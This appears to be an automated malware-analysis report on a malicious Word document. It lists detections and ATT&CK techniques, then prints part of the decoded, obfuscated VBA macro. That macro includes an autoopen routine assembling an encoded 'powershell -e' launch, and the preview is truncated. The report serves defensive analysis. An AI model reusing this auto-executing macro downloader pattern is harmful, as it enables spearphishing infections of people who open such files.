MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and exhibits high-severity heuristics indicating the presence of an AutoOpen VBA macro that uses GetObject for execution. The VBA script, while heavily obfuscated, is indicative of a macro-based downloader. The primary IOC is the VBA macro file itself, which is responsible for the malicious execution.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6895485-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6895485-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 66304 bytes |
SHA-256: 5758746c64a0f3ed63d8578a442221aaab13861163a06087b74adcd7f6bfae8e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FAxXD4BD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function GwUGAABG()
If TD4UAA = j4AQAx Then
F_AxAXo = 878670844 * sAAC_C
L_kAcQ = CX1AA4DA - 181214312 + 221536656 + bXZA1QUZ * 180519116 / 687684910 + 132413818 / Chr(217841140 / CSng(1193741 + Round(H1B_AxAA))) + 680533099 * Log(nAcAAAB) - 780563772 - 624672726 + UC_kQZDA * CLng(wAXBAAQ - Atn(AAAAQAZ / 260495655 / 932860114 + LBAAAox))
cAAZwA_ = 790915169 * ZAxAxXw
End If
If ooxAAD1o = q4BU4U Then
zDQADA = 456215211 * FGAAkA_G
NDGBDD = jc1CZUxD - 982058680 + 358093936 + icAkXXA * 638016230 / 695343707 + 365553849 / Chr(373861723 / CSng(45033617 + Round(CX1w_Aw))) + 486345786 * Log(jAXwAAAk) - 520272280 - 673643551 + hBGoAZ * CLng(fAZkDB - Atn(uAADkZAx / 23342439 / 507253531 + FAQQCQBU))
jAwBAAA = 47553748 * hZw4UAA
End If
If GAoZAcB1 = dCBAwAA Then
HA1_DAAA = 244115750 * aAAA_UA
zBAAQAA_ = N4ABAA - 850837021 + 758916303 + RCAkAB * 417758788 / 923399664 + 409414059 / Chr(341791202 / CSng(540506637 + Round(Pc1ADCQc))) + 851857874 * Log(vCQ44A) - 601172609 - 939937359 + XcZ4AUoU * CLng(cAB_BA - Atn(qxXZUXX / 292116923 / 79869350 + oA4AoB))
qAAo4AA4 = 482107567 * A_wkkx
End If
If kABAwAQ_ = kwoADC1D Then
wBAAAQow = 936405630 * jUAUXQ
pAAxDx = ax4Axk - 744414684 + 759194530 + pB_BQQ * 948190337 / 662594373 + 89247961 / Chr(516832080 / CSng(147418842 + Round(JUADAA))) + 829559119 * Log(MQDwDA) - 101437912 - 500729918 + sDCABCU4 * CLng(vGAABUCw - Atn(zxUQ4A / 485153839 / 323680750 + d4QA4DwC))
wXAxkB_ = 324767836 * PoAoxBGX
End If
If XAc__A = SAwXAAco Then
cB11ZDxZ = 964236524 * FZ4QAD
V1xAA14 = wD1UQG4 - 647787924 + 24892419 + uAc_ABAG * 623425248 / 641852651 + 819746046 / Chr(541826996 / CSng(365730362 + Round(iQAkco))) + 32609363 * Log(tQA1BxA) - 596013355 - 910027266 + w1Bo4AC * CLng(FQCXUDD4 - Atn(oooA4U / 109477167 / 944352017 + mwAAxkA))
ZCC4A_ = 331997746 * fQA1GA
End If
If ScAGUG = HAAxwA Then
FAAAcZ_ = 387973253 * mAko41Dc
YAAAkQ = MUBDUQ - 719411531 + 14933062 + QBZQBx * 914678392 / 419811049 + 947798651 / Chr(277527595 / CSng(24276994 + Round(NGBCQAD))) + 218292611 * Log(WAABDABA) - 594338895 - 437924250 + LQC_oAU * CLng(AXA4UB4 - Atn(mckcDD / 394891619 / 184788849 + TkAAZ4_))
PxGQUZ = 411986600 * MGDcX_UX
End If
If nQAUAxQA = jcCxXA_ Then
HAABcw = 725844013 * BUBAQw
OAQQQoxX = OADwDBA - 602813981 + 28932316 + IAx4AxoA * 297365008 / 420739234 + 721720619 / Chr(535178178 / CSng(359057486 + Round(NQ4AAAX))) + 760451191 * Log(DA1xcCXo) - 918334610 - 102343853 + HoBkkZA * CLng(lAA1AckA - Atn(UBABwBA1 / 476078241 / 521739967 + oxADUDA))
koAA_oUX = 949579463 * hkACZ1A
End If
End Function
Sub autoopen()
On Error Resume Next
If fZcw4A = B4o_Awx Then
RowAo_ = 617247491 * lBAAxc
dA_CcQ = C1kkG_X1 - 844660977 + 226248755 + AUADkD * 708766001 / 665048640 + 524023974 / Chr(130544852 / CSng(574714063 + Round(dGU_DD))) + 354267503 * Log(rAZCBA) - 676250459 - 745898670 + skwBADA4 * CLng(RAAwxDA_ - Atn(sQAUoAoX / 792457977 / 449087255 + DQxcAAAU))
bccAUAA_ = 462045165 * PCDGQcDX
End If
If BUDDAAC = OBAkAAox Then
jZBUcxk = 50936532 * KB1_AAUc
GA1AXCUU = GBAcooA - 296166490 + 96068600 + kADAUB * 690667603 / 376480914 + 83611013 / Chr(607967133 / CSng(903179462 + Round(OoXAXA1A))) + 59062418 * Log(SQABBAAo) - 285361478 - 701024696 + zQZDxAAB * CLng(RUxGkD - Atn(jADUDAAk / 518285541 / 357254851 + SxBAAQ))
ODAUAAX4 = 559290022 * RBZxQ_A
End If
YG_AZXo (uAQGwB + "po" + wAAUDQ4Z + "wersh" + KcABAA + "ell -e " + ADBc4DBD + LAoQBQ + wU1AxcD + pkAoAx + XAxQCxUA + VoZAQUA + QCwCQw + sAAADDXG)
If cDUwD1 = uU_xBA Then
u11BAA = 969764910 * Kc
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.